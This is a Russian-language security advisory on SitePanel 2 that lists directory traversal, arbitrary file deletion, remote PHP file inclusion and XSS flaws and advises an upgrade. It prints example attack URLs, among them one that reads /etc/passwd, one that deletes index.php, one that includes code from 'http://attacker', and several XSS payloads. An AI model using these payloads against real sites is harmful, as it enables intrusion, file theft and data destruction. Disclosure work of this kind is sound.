Множественные уязвимости в SitePanel 2
- Дата публикации:
- 06.05.2005
- Всего просмотров:
- 999
- Опасность:
- Высокая
- Наличие исправления:
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
- Нет данных
- Вектор эксплуатации:
- Воздействие:
- CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
Описание:
Уязвимости позволяют удаленному пользователю выполнить произвольные PHP сценарии, просмотреть файлы на системе и произвести XSS нападение.
1. Обход каталога возможен из-за недостаточной обработки параметра lang. Удаленный пользователь может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример:
http://[target]/users/index.php?lang=en.inc/../../../../../../etc/pa sswd%00
2. Удаленный авторизованный пользователь может также удалить произвольные файлы на системе. Пример:
http://[target]/admin/5.php?do=rmattach&rm=yes&id=../index.php
3. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:
http://[target]/users/main.php?p=http://attacker
4. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:
http://[target]/users/main.php?p =5&do=2&v=177%22%3E[XSS]
http://[target]/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://[target]/admin/5.php?do=chsev2&postid=177&username ss=test&inadmin=no&newsev=4%22%3E[XSS]
http://[target]/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://[target]/users/main.php?p=5&do=0&sho w=closed%22%3E[XSS]
http://[target]/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://[target]/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]
URL производителей: www.sitepanel2.com
Решение: Установите последнюю версию (2.6.1.1) от производителя.
Ссылки:
Multiple SitePanel2 Vulnerabilities